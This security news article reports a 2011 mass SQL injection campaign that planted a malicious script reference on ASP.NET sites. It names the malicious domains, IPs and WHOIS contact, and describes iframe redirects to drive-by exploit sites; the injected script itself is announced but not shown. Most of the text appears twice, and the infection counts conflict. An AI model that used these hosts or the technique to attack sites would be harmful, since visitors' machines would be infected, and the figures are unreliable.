Mass ASP.Net SQL Injection Infects Thousands Of Websites
Hackers have successfully infected about 180,000 websites based on Microsoft's ASP.Net platform with malware from jjghui.com/urchin.js. (SQL injection) which is similar to Lizamoon mass infection that spread terror among the masses a few months ago.
The attack, that started on the 9th of October, has been successful in affecting almost 1.5k sites, which have now been blacklisted, and about 80k+ pages on Google index have a JavaScript malware pointing to it, according to Google.
The visitors of six particular languages are highly vulnerable to the attack--English, German, French, Italian, Polish, and Breton, seen from the following deobfuscated script:
This causes the browser to load an iframe with one of two remote sites:
www3.strongdefenseiz.in and www2.safetosecurity.rr.nu. From there, the iframe plants malware on the visitor's PC via a number of browser drive-by exploits.
This exploit will load even if the visitor doesn't open a file or clicks on a link, which makes it perfect as the "affectee" remains unaware of the attack. The attackers are, however, using exploits that have already been discovered with the concerned patches available. Hence, the target can only be achieved if the visitor is using an outdated, unpatched browser without the latest version of Adobe PDF or Adobe Flash or Java.
Currently, only six out of 43 can detect this malware. These are AntiVir, ByteHero, Fortinet, Jiangmin, McAfee and McAfee-GW-Edition.
What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:
jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.
Which leads us to think that this may be the work of the infamous "Lizamoon mass infection" attackers.
1. ASP and ASP.NET websites are injected with the following script (text is here):
2. Contents of urchin.js is as seen below
3. The above script decodes to the following:
Discovered By: http://blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass-infection.html
The attack, that started on the 9th of October, has been successful in affecting almost 1.5k sites, which have now been blacklisted, and about 80k+ pages on Google index have a JavaScript malware pointing to it, according to Google.
The visitors of six particular languages are highly vulnerable to the attack--English, German, French, Italian, Polish, and Breton, seen from the following deobfuscated script:
This causes the browser to load an iframe with one of two remote sites:
www3.strongdefenseiz.in and www2.safetosecurity.rr.nu. From there, the iframe plants malware on the visitor's PC via a number of browser drive-by exploits.
This exploit will load even if the visitor doesn't open a file or clicks on a link, which makes it perfect as the "affectee" remains unaware of the attack. The attackers are, however, using exploits that have already been discovered with the concerned patches available. Hence, the target can only be achieved if the visitor is using an outdated, unpatched browser without the latest version of Adobe PDF or Adobe Flash or Java.
Currently, only six out of 43 can detect this malware. These are AntiVir, ByteHero, Fortinet, Jiangmin, McAfee and McAfee-GW-Edition.
What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:
Technical Contact:
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us
jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.
Which leads us to think that this may be the work of the infamous "Lizamoon mass infection" attackers.
1. ASP and ASP.NET websites are injected with the following script (text is here):
2. Contents of urchin.js is as seen below
3. The above script decodes to the following:
Discovered By: http://blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass-infection.html